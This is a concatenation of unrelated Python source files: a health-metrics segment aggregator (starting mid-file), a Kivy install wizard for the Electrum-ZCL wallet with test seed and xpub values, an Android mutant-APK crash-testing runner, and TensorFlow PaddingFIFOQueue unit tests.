data = self.calculate_segment(user, device_objs, from_seg, to_seg)
seg_list.append(data)
if device_objs.filter(timestamp__gte=to_seg.timestamp):
from_seg = to_seg
to_seg = from_seg.shift(minutes=15)
else:
break
generate_csv_file(file_path, seg_list)
return True
except Exception as e:
logger.error('Exception-{}'.format(e))
return False
def calculate_segment(self, user, objs, from_seg, to_seg):
"""
Comman function to segmented query
"""
queryset = objs.filter(
user_id=user,
timestamp__range=[from_seg.datetime, to_seg.datetime]
).aggregate(Avg('heart_rate'), Max('heart_rate'),
Min('heart_rate'), Avg('respiration_rate'),
Max('respiration_rate'), Min('respiration_rate'),
Min('timestamp'), Max('timestamp'))
data = self.format_data(user, queryset)
data['start_time'] = from_seg.format('YYYY-MM-DD HH:mm:ss')
data['end_time'] = to_seg.format('YYYY-MM-DD HH:mm:ss')
return data
def range_segment(self, file_path, timestamp, timezone):
"""
To calculate hourly range of avg, min, max of each user from the
original UTC to particular timezone
"""
try:
seg_list = []
for user in [*self.user_qs]:
logger.info('user - {}'.format(user))
from_ts = timestamp.to(timezone)
to_ts = from_ts.shift(minutes=60)
device_objs = DeviceModel.objects.filter(
user_id=user,
timestamp__range=[from_ts.datetime, to_ts.datetime]
)
cur_ts = from_ts.shift(minutes=15)
while True:
data = self.calculate_segment(user, device_objs, from_ts, cur_ts)
seg_list.append(data)
if cur_ts == to_ts:
break
from_ts = cur_ts
cur_ts = from_ts.shift(minutes=15)
generate_csv_file(file_path, seg_list)
return True
except Exception as e:
logger.error('Exception-{}'.format(e))
return False
|
installwizard.py
|
from functools import partial
import threading
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.utils import platform
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.clock import Clock
from kivy.utils import platform
from electrum_zcl_gui.kivy.uix.dialogs import EventsDialog
from electrum_zcl_gui.kivy.i18n import _
from electrum_zcl.base_wizard import BaseWizard
from password_dialog import PasswordDialog
# global Variables
app = App.get_running_app()
is_test = (platform == "linux")
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum_zcl_gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: 0, 0, 0, .9
Rectangle:
size: Window.size
Color:
rgba: .239, .588, .882, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From %d cosigners')%n.value
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require %d signatures')%m.value
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<RestoreSeedDialog>
message: ''
word: ''
BigLabel:
text: "ENTER YOUR SEED PHRASE"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
on_release: root.options_dialog()
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
BigLabel:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
on_release: root.options_dialog()
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '27dp'
SeedLabel:
text: root.warning
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
super(WizardDialog, self).__init__(**kwargs)
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
_trigger_size_dialog = Clock.create_trigger(self._size_dialog)
Window.bind(size=_trigger_size_dialog,
rotation=_trigger_size_dialog)
_trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_dismiss(self):
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum_zcl.mnemonic import Mnemonic
from electrum_zcl.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
def options_dialog(self):
from seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def on_text(self, dt):
self.ids.next.disabled = not bool(self._test(self.get_text()))
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and last_word
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
text = unicode(ti.text).strip()
text = ' '.join(text.split())
return text
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), False, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.is_valid = kwargs['is_valid']
self.title = kwargs['title']
self.message = kwargs['message']
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return unicode(ti.text).strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else unicode(self.app._clipboard.paste())
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
`on_wizard_complete` Fired when the wizard is done creating/ restoring
wallet/s.
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
app.show_info_bubble(
text=msg, icon='atlas://gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, **kwargs):
self.dispatch('on_wizard_complete', self.wallet)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.')
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_error(self, msg):
Clock.schedule_once(lambda dt: app.show_error(msg))
def password_dialog(self, message, callback):
popup = PasswordDialog()
popup.init(message, callback)
popup.open()
def request_password(self, run_next):
def callback(pin):
if pin:
self.run('confirm_password', pin, run_next)
else:
run_next(None)
self.password_dialog('Choose a PIN code', callback)
def confirm_password(self, pin, run_next):
def callback(conf):
if conf == pin:
run_next(pin, False)
else:
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
self.password_dialog('Confirm your PIN code', callback)
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
|
RunMutants.py
|
#coding:utf-8
import sys,os
import logging
from DeviceHelper import get_available_devices
from Device import Device
from App.app import App
from ConfigReader import ConfigReader
import threading,time
class RunMutants(object):
# this is a single instance class
_instance_lock = threading.Lock()
# How long we wait until we timeout on key dispatching.(Input event dispatching timed out)
KEY_DISPATCHING_TIMEOUT = 5 # seconds
def __init__(self,app_path=None,output_dir=None,singlemode=True,debug_mode=False):
logging.basicConfig(level=logging.DEBUG if debug_mode else logging.INFO)
self.logger = logging.getLogger(self.__class__.__name__)
all_devices = get_available_devices()
if len(all_devices) == 0:
self.logger.warning("ERROR: No device connected.")
sys.exit(-1)
self.vtDevice =[]
if singlemode:
self.vtDevice.append(Device(all_devices[0]))
else:
for device in all_devices:
self.vtDevice.append(Device(device))
#self.app = App(app_path, output_dir=output_dir)
self.lock = threading.Lock()
self.androidProject = None
self.mutantApkDir = None
self.projectApkDir = None
self.apkPaths = []
self.apps = []
self.mutation_home="."
def __new__(cls, *args, **kwargs):
if not hasattr(RunMutants, "_instance"):
with RunMutants._instance_lock:
if not hasattr(RunMutants, "_instance"):
RunMutants._instance = object.__new__(cls)
return RunMutants._instance
def start(self):
settings = ConfigReader().readXML(sys.argv)
self.androidProject = settings["project_name"]
self.mutantApkDir = settings["apk_output"]
self.mutation_home = settings["mutation_home"]
self.projectApkDir = self.mutantApkDir + os.sep + self.androidProject
self.getApkPaths(self.projectApkDir,self.apkPaths)
self.initApps()
#print "length: ",len(self.apkPaths)
threads = []
for device in self.vtDevice:
task = threading.Thread(target=self.check_crash_app,args=(device,))
task.start()
threads.append(task)
for t in threads:
t.join()
self.output_compilation_and_crash_report()
def check_crash_app(self,device):
device.set_up()
device.connect()
app = self.getOneApp()
if app is not None:
device.uninstall_app(app)
while app is not None:
device.install_app(app)
device.start_app(app)
time.sleep(RunMutants.KEY_DISPATCHING_TIMEOUT)
# print "Activity Name: "+device.get_top_activity_name(),self.app.get_package_name()
print "----------------------------------------------------"
print "APK: ",app.app_path
if device.app_is_running(app.get_package_name()):
print " Launch app successfully... "
else:
# creating a file flag while apk file is crash
open(str(app.app_path).replace(".apk", "_app_crash_flag"),"w").close()
print "Launch app failed..."
print "----------------------------------------------------"
device.uninstall_app(app)
app = self.getOneApp()
self.stop()
def initApps(self):
self.apps = []
for appPath in self.apkPaths:
self.apps.append(appPath)
def getOneApp(self):
app = None
if self.apps is not None:
self.lock.acquire()
if len(self.apps) > 0:
app = self.apps.pop()
self.lock.release()
if app is None:
return None
return App(app)
def stop(self):
for device in self.vtDevice:
device.disconnect()
def getApkPaths(self,path,apkPaths):
fileNameList = os.listdir(path)
for fileName in fileNameList:
filePath = path+os.sep+fileName
if os.path.isdir(filePath):
self.getApkPaths(filePath,apkPaths)
continue
if str(fileName).endswith(".apk"):
apkPaths.append(filePath)
def getCrashFlag(self,path,crashFlagList):
fileNameList = os.listdir(path)
for fileName in fileNameList:
filePath = path+os.sep+fileName
if os.path.isdir(filePath):
self.getCrashFlag(filePath,crashFlagList)
continue
if str(fileName).endswith("_app_crash_flag"):
crashFlagList.append(filePath)
def output_compilation_and_crash_report(self):
crashFlagList = []
self.getCrashFlag(self.projectApkDir, crashFlagList)
outputFileDir = self.mutation_home+os.sep+"reports";
if not os.path.exists(outputFileDir):
os.makedirs(outputFileDir)
outputFile = open(outputFileDir+os.sep+self.androidProject+"_report.txt","a")
print "----------------------------------------------------"
outputFile.write("----------------------------------------------------"+os.linesep)
print "Output Report("+time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())+"):"
outputFile.write("Output Report("+time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())+"):" +os.linesep)
print "----------------------------------------------------"
outputFile.write("----------------------------------------------------"+os.linesep)
mutantsCount,failedCount = self.get_compilation_results()
print "Mutants Count: ",mutantsCount
outputFile.write("Mutants Count: "+str(mutantsCount)+os.linesep)
print "Compilation Success: ",mutantsCount-failedCount,"\tCompilation Failed: ",failedCount
outputFile.write("Compilation Success: "+str(mutantsCount-failedCount)+" Compilation Failed: "+str(failedCount)+os.linesep)
print "APK File: ", len(self.apkPaths)
outputFile.write("APK File: "+str(len(self.apkPaths))+os.linesep)
success = len(self.apkPaths) - len(crashFlagList)
failed = len(crashFlagList)
print "Launch Success : ", success, "\tLaunch Failed: ", failed
outputFile.write("Launch Success : "+str(success)+ " Launch Failed: "+str(failed)+os.linesep)
print "----------------------------------------------------"
outputFile.write("----------------------------------------------------")
outputFile.close()
def get_compilation_results(self):
javaFileCount = 0
compilationFailedCount = 0
vtClassName = os.listdir(self.projectApkDir)
for className in vtClassName:
classPath = self.projectApkDir + os.sep + className
vtMethodName = os.listdir(classPath)
for methodName in vtMethodName:
methodPath = classPath + os.sep + methodName
if os.path.isdir(methodPath):
vtMutantName = os.listdir(methodPath)
for mutantName in vtMutantName:
mutantPath = methodPath + os.sep + mutantName
vtFileName = os.listdir(mutantPath)
for fileName in vtFileName:
if fileName.endswith(".java"):
javaFileCount+=1
if len(vtFileName) == 1:
compilationFailedCount+=1
return javaFileCount,compilationFailedCount
if "__main__" == __name__:
RunMutants().start()
sys.exit(0)
|
padding_fifo_queue_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.PaddingFIFOQueue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
class PaddingFIFOQueueTest(tf.test.TestCase):
def testConstructor(self):
with tf.Graph().as_default():
q = tf.PaddingFIFOQueue(10, tf.float32, ((None,),), name="Q")
self.assertTrue(isinstance(q.queue_ref, tf.Tensor))
self.assertEquals(tf.string_ref, q.queue_ref.dtype)
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueue'
attr { key: 'component_types' value { list { type: DT_FLOAT } } }
attr { key: 'shapes' value { list { shape { dim { size: -1 } } } } }
attr { key: 'capacity' value { i: 10 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.queue_ref.op.node_def)
def testMultiQueueConstructor(self):
with tf.Graph().as_default():
q = tf.PaddingFIFOQueue(5, (tf.int32, tf.float32),
((), ()),
shared_name="foo", name="Q")
self.assertTrue(isinstance(q.queue_ref, tf.Tensor))
self.assertEquals(tf.string_ref, q.queue_ref.dtype)
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueue'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list { shape { } shape { } } } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: 'foo' } }
""", q.queue_ref.op.node_def)
def testConstructorWithShapes(self):
with tf.Graph().as_default():
q = tf.PaddingFIFOQueue(5, (tf.int32, tf.float32),
shapes=(tf.TensorShape([1, 1, 2, 3]),
tf.TensorShape([5, 8])), name="Q")
self.assertTrue(isinstance(q.queue_ref, tf.Tensor))
self.assertEquals(tf.string_ref, q.queue_ref.dtype)
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueue'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list {
shape { dim { size: 1 }
dim { size: 1 }
dim { size: 2 }
dim { size: 3 } }
shape { dim { size: 5 }
dim { size: 8 } }
} } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.queue_ref.op.node_def)
def testEnqueue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
enqueue_op = q.enqueue((10.0,))
enqueue_op.run()
def testEnqueueWithShape(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, shapes=((3, 2),))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
self.assertEqual(1, q.size().eval())
def testEnqueueManyWithShape(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, [tf.int32, tf.int32],
shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertEqual(4, q.size().eval())
def testParallelEnqueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
sess.run(enqueue_op)
threads = [self.checkedThread(target=enqueue, args=(e,))
for e in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in xrange(len(elems)):
vals = dequeued_t.eval()
self.assertEqual([elems[i]], vals)
def testEnqueueAndBlockingDequeue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(3, tf.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
sess.run(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(sess.run(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
for elem, result in zip(elems, results):
self.assertEqual([elem], result)
def testMultiEnqueueAndDequeue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.float32), ((), ()))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in xrange(len(elems)):
x_val, y_val = sess.run(dequeued_t)
x, y = elems[i]
self.assertEqual([x], x_val)
self.assertEqual([y], y_val)
def testQueueSizeEmpty(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
self.assertEqual([0], q.size().eval())
